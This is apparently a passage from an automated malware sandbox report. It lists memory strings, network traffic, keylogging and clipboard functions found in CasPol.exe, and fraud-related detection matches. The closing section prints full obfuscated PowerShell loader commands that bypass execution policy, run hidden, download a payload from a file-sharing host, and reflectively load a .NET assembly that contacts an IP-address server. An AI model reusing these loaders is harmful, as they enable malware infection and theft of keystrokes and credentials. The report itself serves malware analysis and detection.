                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://content-autofill.googleapis.com/b-
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cuscochromeextension-pa.googleapis.com/v_turned_down_returns_404/omniboxsuggestionsb
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                    Source: chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_S_Delay_GA4Kids_20230926_An
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_XS_Delay_GA4Kids_20230926
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Wk
                    Source: chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/cl
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Vs
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                    Source: chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/7
                    Source: chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/BiddingAndScoringDebugReportingAPIKAnonymityService
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Con
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/ndScoringDebugReportingAPI7
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.comb
                    Source: chrome.exe, 00000010.00000003.2151458786.0000372001028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                    Source: chrome.exe, 00000010.00000003.2151458786.0000372001028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                    Source: chrome.exe, 00000010.00000003.2151458786.0000372001028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard7
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                    Source: chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                    Source: chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                    Source: powershell.exe, 00000001.00000002.1600493692.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: chrome.exe, 00000010.00000003.2129369509.00003720013C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/
                    Source: chrome.exe, 00000010.00000003.2129369509.00003720013C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/OfflinePagesPrefetchingForcedOn_OfflinePagesPrefetchingOfflinePage
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/b
                    Source: powershell.exe, 00000001.00000002.1597053881.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1478768021.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2#
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=blockedb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tunnel-staging.googlezip.net/2
                    Source: CasPol.exeString found in binary or memory: https://www.google.com
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/2(
                    Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/b
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromesuggestionsJ
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromesuggestionsJK
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/coacbE
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chrome-content-suggestionsb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 00000010.00000003.2157001994.00003720011CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/android/translate_ranker_
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.privacysandbox.comb
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55664 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55693 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55664
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55677
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55693
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55677 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.8:49706 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB77 SystemParametersInfoW,12_2_0041BB77

                    System Summary

                    barindex
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 